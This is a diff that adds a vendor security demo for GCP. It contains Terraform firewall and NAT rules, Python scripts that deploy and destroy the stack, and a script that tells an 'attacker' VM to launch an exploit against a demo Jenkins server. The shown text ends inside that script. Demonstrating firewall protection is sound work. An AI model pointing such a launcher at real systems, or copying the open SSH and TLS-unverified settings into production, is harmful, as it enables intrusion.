+ destination_port = "221"
+}
+
+resource "panos_service_object" "so_222" {
+ name = "service-tcp-222"
+ protocol = "tcp"
+ destination_port = "222"
+}
+
+resource "panos_address_object" "intLB" {
+ name = "GCP-Int-LB"
+ value = "${var.WebLB_IP}"
+ description = "GCP Int LB Address"
+}
+
+resource "panos_security_policies" "security_policies" {
+ rule {
+ name = "SSH inbound"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["ssh", "ping"]
+ services = ["application-default"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "SSH 221-222 inbound"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["ssh", "ping"]
+ services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Allow all ping"
+ source_zones = ["any"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["any"]
+ destination_addresses = ["any"]
+ applications = ["ping"]
+ services = ["application-default"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Permit Health Checks"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["google-health-check"]
+ services = ["service-http"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Web browsing"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"]
+ destination_addresses = ["any"]
+ applications = ["web-browsing", "jenkins"]
+ services = ["service-http"]
+ categories = ["any"]
+ group = "Inbound"
+ action = "allow"
+ }
+
+ rule {
+ name = "Allow all outbound"
+ source_zones = ["${panos_zone.zone_trust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_addresses = ["any"]
+ applications = ["any"]
+ services = ["application-default"]
+ categories = ["any"]
+ group = "Outbound"
+ action = "allow"
+ }
+}
+
+resource "panos_nat_rule_group" "nat" {
+ rule {
+ name = "Web1 SSH"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "${panos_service_object.so_221.name}"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "${var.Webserver_IP1}"
+ port = 22
+ }
+ }
+ }
+ }
+ rule {
+ name = "Web2 SSH"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "${panos_service_object.so_222.name}"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "${var.Webserver_IP2}"
+ port = 22
+ }
+ }
+ }
+ }
+ rule {
+ name = "Webserver NAT"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "service-http"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "GCP-Int-LB"
+ }
+ }
+ }
+ }
+}
+resource "panos_virtual_router" "vr1" {
+ name = "default"
+ interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"]
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
new file mode 100644
index 00000000..879b9d9b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
@@ -0,0 +1,7 @@
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "WebLB_IP" {}
+variable "Admin_Username" {}
+variable "Admin_Password" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
new file mode 100644
index 00000000..ae5cfd65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
@@ -0,0 +1,11 @@
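+# Firewall admin credentials are left blank here; supply them at deploy time (for example via -var flags or deploy.py's -u/-p options).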
+Admin_Username = ""
+
+Admin_Password = ""
+
+FW_Untrust_IP = "10.0.1.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/deploy.py b/gcp/Jenkins_proj-master/deploy.py
new file mode 100644
index 00000000..35b66a1e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/deploy.py
@@ -0,0 +1,653 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u -p -r -a
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+from google.cloud import storage
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ """
+ Handles sending requests to API
+ :param call: url
+ :return: Returns result of call. Will return response for codes between 200 and 400.
+ If 200 response code is required check value in response
+ """
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
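+# Illustrative only: callers pass a full PAN-OS XML API URL, for example
+#   send_request("https://%s/api/?type=op&cmd=<show><system><info></info></system></show>&key=%s" % (fwMgtIP, api_key))
+# and DeployRequestException is raised on any transport failure or 4xx/5xx status.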
+
+class DeployRequestException(Exception):
+ pass
+
+def walkdict(dict, match):
+ """
+ Finds a key in a dict or nested dict and returns the value associated with it
+ :param dict: dict or nested dict to search
+ :param match: key to look for
+ :return: value associated with the first matching key, or None if not found
+ """
+ for key, v in dict.items():
+ if key == match:
+ jobid = v
+ return jobid
+ elif isinstance(v, OrderedDict):
+ found = walkdict(v, match)
+ if found is not None:
+ return found
+
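+# Illustrative only: for xmltodict output such as
+#   OrderedDict([('response', OrderedDict([('result', OrderedDict([('job', '42')]))]))])
+# walkdict(parsed, 'job') returns '42'; it returns None when no matching key is found.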
+
+
+def update_fw(fwMgtIP, api_key):
+ """
+ Applies latest AppID, Threat and AV updates to firewall after launch
+ :param fwMgtIP: Firewall management IP
+ :param api_key: API key
+
+ """
+ # # Download latest applications and threats
+
+ type = "op"
+ cmd = ""
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except DeployRequestException:
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+        except DeployRequestException:
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete ")
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+ # Install latest content update
+ type = "op"
+    # Standard PAN-OS op command to install the most recently downloaded content package
+    cmd = "<request><content><upgrade><install><version>latest</version><sync-to-peer>no</sync-to-peer></install></upgrade></content></request>"
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except DeployRequestException:
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+        except DeployRequestException:
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP Install Complete ")
+ completed = 1
+ print("Install latest Applications and Threats update")
+ status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+ # Download latest anti-virus update without committing
+ getjobid = 0
+ jobid = ''
+ type = "op"
+    # Standard PAN-OS op command to download (without installing) the latest anti-virus package
+    cmd = "<request><anti-virus><upgrade><download><latest/></download></upgrade></anti-virus></request>"
+ key = 'job'
+ while getjobid == 0:
+ try:
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+        except DeployRequestException:
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.info("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+ """
+ Generates a Paloaltonetworks api key from username and password credentials
+ :param hostname: Ip address of firewall
+ :param username:
+ :param password:
+ :return: api_key API key for firewall
+ """
+
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 10 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
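+            # A successful keygen call returns <response><result><key>...</key></result></response>,
+            # so the API key is the text of the first grandchild element.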
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwIP: IP address of the firewall management interface to be probed
+    :param api_key: PAN-OS API key
+    """
+    fwip = fwIP
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready/></show>&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+        logger.info("Http Error: {}".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ """
+ For tracking purposes. Write responses to file.
+ :param key:
+ :param value:
+ :return:
+ """
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+ # write status to file to future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 18
+ while True:
+ if count < max_count:
+ time.sleep(10)
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+                logger.debug("Got invalid response: {}".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+ """
+ Handles terraform operations and returns variables in outputs.tf as a dict.
+ :param working_dir: Directory that contains the tf files
+ :param vars: Additional variables passed in to override defaults equivalent to -var
+ :param description: Description of the deployment for logging purposes
+ :return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+ """
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+        # if capture output is False, then everything will essentially go to stdout and stderr
+ stderr = sys.stderr
+ stdout = sys.stdout
+
+ start_time = time.asctime()
+ print('Starting Deployment at {}\n'.format(start_time))
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir=working_dir)
+
+ tf.cmd('init')
+ if run_plan:
+
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+ skip_plan = True, **kwargs)
+ outputs = tf.output()
+
+ logger.debug('Got Return code {} for deployment of {}'.format(return_code, description))
+
+ return (return_code, outputs)
+
+
+
+def main(username, password, GCP_region, Billing_Account ):
+
+    """
+    Main function
+    :param username: Firewall admin username
+    :param password: Firewall admin password
+    :param GCP_region: GCP region to deploy into
+    :param Billing_Account: GCP billing account ID
+    :return:
+    """
+ username = username
+ password = password
+ # TODO maybe use a zone lookup but for now use region-B
+ GCP_Zone = GCP_region + '-b'
+
+
+
+
+
+ WebInDeploy_vars = {
+ 'GCP_Zone': GCP_Zone,
+ 'GCP_Region': GCP_region,
+ 'Billing_Account': Billing_Account,
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ #
+ # Build Infrastructure
+ #
+ #
+
+ return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code == 0:
+ update_status('web_in_deploy_status', 'success')
+ albDns = web_in_deploy_output['ALB-DNS']['value']
+ nlbDns = web_in_deploy_output['NATIVE-DNS']['value']
+ fwMgtIP = web_in_deploy_output['FW_Mgmt_IP']['value']
+
+ logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("Load balancer address is {}".format(albDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgtIP))
+
+ else:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ #
+ # Check firewall is up and running
+ #
+ #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+ logger.info("Updating firewall with latest content pack")
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+    logger.info("Applying additional config to firewall")
+
+ return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+ logger.debug('Got return code {}'.format(return_code))
+ if return_code == 0:
+ update_status('web_in_fw_conf', 'success')
+ logger.info("WebInFWConf succeeded")
+
+ else:
+ logger.info("WebInFWConf failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-a', '--GCP_Region', help='GCP Region', required=True)
+ # parser.add_argument('-r', '--GCP_Zone', help='GCP Zone', required=True)
+ parser.add_argument('-m', '--Billing_Account', help='Billing Account', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ # GCP_Zone = args.GCP_Zone
+ GCP_Region = args.GCP_Region
+ Billing_Account = args.Billing_Account
+
+ main(username, password, GCP_Region, Billing_Account)
diff --git a/gcp/Jenkins_proj-master/destroy.py b/gcp/Jenkins_proj-master/destroy.py
new file mode 100644
index 00000000..a314e0d1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/destroy.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+
+python destroy.py -u <fwusername> -p <fwpassword>
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+ username = username
+ password = password
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInBootstrap_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ albDns = ''
+ nlbDns = ''
+ fwMgt = ''
+
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ deployment_status = {}
+ kwargs = {"auto-approve": True}
+
+ #
+ # Destroy Infrastructure
+ #
+ tf = Terraform(working_dir='./WebInDeploy')
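+    # Read names recorded in the existing Terraform state so the same values can be
+    # passed back into the destroy run as -var overrides.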
+ rg_name = tf.output('RG_Name')
+
+ attack_rg_name = tf.output('Attacker_RG_Name')
+ logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+ WebInDeploy_vars.update({'RG_Name': rg_name})
+ WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+ if return_code1 != 0:
+ logger.info("Failed to destroy build ")
+
+ exit()
+ else:
+
+ logger.info("Destroyed WebInDeploy ")
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+
+ main(username, password)
diff --git a/gcp/Jenkins_proj-master/gcp_login.py b/gcp/Jenkins_proj-master/gcp_login.py
new file mode 100644
index 00000000..ecec1f80
--- /dev/null
+++ b/gcp/Jenkins_proj-master/gcp_login.py
@@ -0,0 +1,23 @@
+import os
+"""
+gcloud_login
+Runs the shell command to invoke login.
+The login process creates a new browser window for interactive login.
+The login process updates the gcloud auth files in ~/.config/gcloud
+Files updated are:
+ access_tokens.db
+ config_sentinel
+ credentials.db
+
+The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db
+
+https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/
+
+"""
+
+def gcloud_login():
+ cmd = 'gcloud auth login'
+ os.system(cmd)
+
+if __name__ == '__main__':
+ gcloud_login()
diff --git a/gcp/Jenkins_proj-master/launch_attack_vector.py b/gcp/Jenkins_proj-master/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/gcp/Jenkins_proj-master/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError:
+            print('Could not parse terraform outputs!')
+
+    # Fall back to an empty dict if terraform output fails or cannot be parsed
+    return dict()
+
+
+def main(attack_vector: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+ print(outputs)
+ if attack_vector == 'native':
+ print('Using native waf protected attack vector...\n')
+ target = outputs['NATIVE-DNS']['value']
+ elif attack_vector == 'panos':
+ print('Using PAN-OS protected attack vector...\n')
+ target = outputs['ALB-DNS']['value']
+    else:
+        print('Unknown attack vector specified, defaulting target to 127.0.0.1\n')
+        target = '127.0.0.1'
+ if 'ATTACKER_IP' not in outputs:
+ print('No attacker ip found in tf outputs!')
+ sys.exit(1)
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['attacker'] = attacker
+ payload['target'] = target
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Exploit Successfully Launched!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Launch Exploit!\n')
+ print(resp.text)
